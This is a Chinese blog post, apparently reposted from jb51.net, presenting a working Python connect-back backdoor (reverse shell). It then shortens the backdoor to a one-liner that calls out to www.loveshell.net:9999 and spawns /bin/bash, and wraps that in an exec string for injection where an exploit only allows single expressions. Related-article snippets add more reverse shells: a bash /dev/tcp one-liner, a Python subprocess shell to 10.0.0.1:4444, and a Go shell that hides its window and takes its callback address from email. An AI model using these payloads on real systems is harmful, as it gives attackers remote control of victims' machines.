我非我同学的python的反弹shell的代码

最新推荐文章于 2023-10-22 18:46:20 发布
最新推荐文章于 2023-10-22 18:46:20 发布
阅读量3.8k 收藏
点赞数
分类专栏: 其他 文章标签: python shell import sockets stream gmail

不知道怎么忽然想看这个,呵呵
小我的python的反shell的代码
#!/usr/bin/python
# Python Connect-back Backdoor
# Author: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>
# Version: 1.0
# Date: July 15th 2006
import sys
import os
import socket
shell = "/bin/sh"
def usage(programname):
  print "Python Connect-back Backdoor"
  print "Auther: wofeiwo <wofeiwo[0x40]gmail[0x2e]com>"
  print "Date: July 15th 2006/n"
  print "Usage: %s <conn_back_host> <port>/n" % programname
def main():
  if len(sys.argv) != 3: 
    usage(sys.argv[0])
    sys.exit(1)
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  try: 
    s.connect((socket.gethostbyname(sys.argv[1]),int(sys.argv[2])))
    print "[+] Connect ok." 
  except: 
    print "[-] Could not connect to %s:%s" % (sys.argv[1], sys.argv[2]) 
    sys.exit(2)
  s.send("-------------------- Python Connect-back Backdoor --------------------/n")
  s.send("----------------------------- By wofeiwo -----------------------------/n")
  os.dup2(s.fileno(), 0)
  os.dup2(s.fileno(), 1)
  os.dup2(s.fileno(), 2)
  global shell
  os.system(shell)
  print "See U!"
  s.close()
if __name__ == "__main__": main()

用在漏洞利用的时候不太好,不是么?我们想要短点的,节省下就是
import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master/r/n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?/r/n");os.system("/bin/bash");s.close();s.send("See u next time!/r/n");

如何?很短了吧?
不过很可能漏洞利用的地方不允许多语句,譬如允许的输入是在eval当中,不能多语句(后面有解释)那么还可以变化下
exec 'import sys;import os;import socket;s = socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect((socket.gethostbyname("www.loveshell.net"),9999));s.send("Welcome my master//r//n");os.dup2(s.fileno(), 0);os.dup2(s.fileno(), 1);os.dup2(s.fileno(), 2);s.send("Is there a shell?//r//n");os.system("/bin/bash");s.close();s.send("See u next time!//r//n");';

注意是//r//n哦,即使在''里好象/r/n一样会成为换行,所以其实这里即使不用;一样可以构造好代码的,另外,为什么不用eval呢?
翻了下手册
exec语句用来执行储存在字符串或文件中的Python语句。例如,我们可以在运行时生成一个包含Python代码的字符串,然后使用exec语句执行这些语句

eval语句用来计算存储在字符串中的有效Python表达式

呵呵,这里用eval好象会出错.
YY一下,思想是相同的,但是具体到语言又是不一样的,如何跳出语言的限制呢?是个问题......
本文来自: 脚本之家(www.jb51.net) 详细出处参考:http://www.jb51.net/html/200708/97/11135.htm 

破法者
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Golang反弹shell(使用邮件获取反弹地址)
09-29
使用邮件地址作为反弹shell的服务器地址,用于windows的反弹shell,可在编译时选择隐藏弹出窗口 This golng reverse shell fetches the address from your latest email subject, and the subject should be like this: 10.1.1.1:1234 This golag file requires go-pop3 lib which you can get it here: https://github.com/taknb2nch/go-pop3.git If you want to hide the window when executing it, compile the program like this: go build -ldflags -H=windowsgui email_reverse_shell-repl.go
各种shell反弹方法
weixin_46626737的博客
05-16 1430
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 4649
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
python反弹shell
weixin_42576467的博客
01-07 636
你是想问 Python 如何实现反弹 shell 吗? 反弹 shell 是一种通过远程连接获取受害者计算机的 shell 权限的攻击技术。 使用 Python 反弹 shell 的方法如下: 首先,在本地计算机上运行一个监听程序,等待连接。 然后,在受害者计算机上运行一个 Python 脚本,该脚本将连接到本地计算机的监听程序。 当连接建立后,就可以通过本地计算机上的 shell 命令控制...
Python我的世界小游戏源代码
12-29
Python我的世界小游戏源代码,我的世界小游戏使用方法: 移动 前进:W,后退:S,向左:A,向右:D,环顾四周:鼠标,跳起:空格键,切换飞行模式:Tab; 选择建筑材料 砖:1,草:2,沙子:3,删除建筑:鼠标左键单击...
点燃我温暖你python爱心代码
12-17
python实现点燃我温暖你中李询爱心代码
我的世界源代码python实现).zip
08-13
来源于热门沙盘游戏我的世界,使用Python复刻该游戏
这是python我的世界源代码
06-23
这就是minecraft源代码。希望大家可以学习一下,也可以试着自己写一写,试着玩一下吧!
python邮件反弹shell
09-29
使用python反弹shell,根据邮件确定反弹地址
反弹Shell升级为交互式Shel
weixin_46622976的博客
04-27 1304
前言 经常我们拿到的shell是一个简单的shell 如何把一个简单的shell就升级到一个标准交互式shell 写这篇文章记录一下 正文 攻击机:kali 靶机:ubuntu 普通Shell 给kali弹shell bash -i >& /dev/tcp/192.168.145.128/4444 0>&1 kali:nc -lvvp 4444 然后发现这个shell有很多问题 无法使用vim等文本编辑器 不能补全 不能su 没有向上箭头使用历史 等等 .
Python获取bash反弹shell,并与bash交互
最新发布
Locosomnus的博客
10-22 139
利用python获取来自bash的反弹shell
Python编程求:一个球从100m高度自由落下,每次落地后反跳回原高度的一半,再落下,反弹,求在第十次落地时,共经过多少米,第十次反弹多高
qq_34079624的博客
03-12 2万+
sn = 100 hn = sn/2 for n in range(2,10): sn = sn + 2*hn hn = hn/2 print("第10次落地共经过:",sn,"米") print("第10次反弹",hn,"米高")
[Web安全]Python利用Socket反弹shell,多线程反弹Shell
_DESpiSED的博客
09-22 1939
本文详细介绍了Python利用套接字编程反弹shell和多线程反弹shell的过程,给网络安全初学者提供一定思路。
python 反弹shell 交互
qq_32851223的博客
11-14 1039
本篇介绍解决如下问题的python脚本:漏洞利用,监听攻击机的端口拿到反弹shell,利用反弹shell进行横向的信息探索。
反弹shell的N种姿势
记录并分享学习安全的知识点..
09-13 1万+
在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。
球落地反弹高度问题(python
weixin_71936669的博客
10-06 2219
一个球从100米的高度自由落下,每次落地后反跳回原来高度的一半; (1)求他在第10次落地时,共经过多少米? (2)第12次落地后反弹多高
golang写的反弹shell(自作孽不可活,切记,切记!)
热门推荐
神棍之路
10-23 7万+
仅作安全研究 package main import ( "go-pop3" "log" "strings" "os/exec" "net" "fmt" "syscall" "bufio" ) func reverseshell(addr string){ c,_:=net.Dial("tcp", addr);
反弹shell汇总(超详细)
qq_52173020的博客
05-27 4591
别怕失败.
python反弹shell代码
09-04
下面是一个简单的 Python 反弹 shell代码示例: ``` import socket import subprocess HOST = '10.0.0.1' # 连接的主机 PORT = 4444 # 连接的端口 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) # 创建一个子进程来执行 shell 命令 # 并且将输出返回到我们的套接字 p = subprocess.Popen(['/bin/sh', '-i'], stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno()) # 保持连接打开 p.wait() s.close() ``` 上面的代码建立了一个 socket 连接,并在连接上运行一个 shell。它将 shell 的输入和输出连接到 socket 上,因此你可以通过 socket 来控制 shell。 注意:这段代码仅供参考,在生产环境中使用反弹 shell 是不被允许的,并且会被视为法行为。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值